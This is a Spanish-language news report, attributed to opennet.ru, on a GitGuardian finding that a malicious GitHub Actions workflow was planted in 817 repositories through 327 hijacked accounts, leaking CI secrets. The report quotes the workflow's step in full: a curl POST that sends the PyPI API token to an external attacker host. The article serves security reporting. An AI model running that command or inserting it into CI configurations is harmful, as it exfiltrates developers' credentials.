Investigadores de GitGuardian han identificado un ataque masivo a usuarios de GitHub que implicó tomar el control de 327 cuentas e instalar un controlador de acciones de GitHub malicioso en 817 repositorios. El ataque resultó en la filtración de 3325 secretos utilizados en sistemas de integración continua y transmitidos a través de variables de entorno, incluyendo tokens de acceso a PyPI, GitHub, NPM, DockerHub y varios servicios de almacenamiento en la nube.
GitHub Actions permite a los desarrolladores de código asociar controladores para automatizar diversas operaciones en GitHub. Por ejemplo, GitHub Actions puede usarse para realizar ciertas comprobaciones y pruebas al realizar commits, o para automatizar el procesamiento de nuevas incidencias. El controlador malicioso se distribuyó bajo el nombre de "Github Actions Security" e incluía un comando "curl" en la sección "run" que enviaba el contenido de las variables de entorno a un host externo al ejecutar tareas en un entorno de integración continua. La confirmación maliciosa se agregó desde las cuentas de los responsables del proyecto, quienes probablemente habían sido víctimas de ataques informáticos o de phishing.
El ataque se descubrió tras analizar la actividad anómala relacionada con el paquete FastUUID, que proporciona un contenedor de Python para la biblioteca UUID de Rust. FastUUID, que se ha descargado casi 1.2 millones de veces la última semana, se utiliza como dependencia en el popular proyecto LiteLLM, que registra más de 5 millones de descargas semanales en PyPI. El análisis de los cambios en el repositorio FastUUID mostró que el 2 de septiembre, el responsable del proyecto añadió una confirmación con un nuevo controlador de acciones de Github, que contenía código para enviar un token al repositorio de PyPI en un host externo. — nombre: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
El problema se identificó antes de que los atacantes usaran el token interceptado; no se publicaron cambios maliciosos ni versiones modificadas del paquete en PyPI para FastUUID. Se detectaron sustituciones similares de acciones de Github en 816 repositorios más, y se enviaron notificaciones a sus propietarios, así como a la administración de PyPI, GitHub, NPM y DockerHub. Hasta ayer por la tarde, se habían revertido confirmaciones maliciosas en unos 100 repositorios. Actualmente, una búsqueda en GitHub identifica 671 confirmaciones con acciones maliciosas de GitHub.
Fuente: opennet.ru
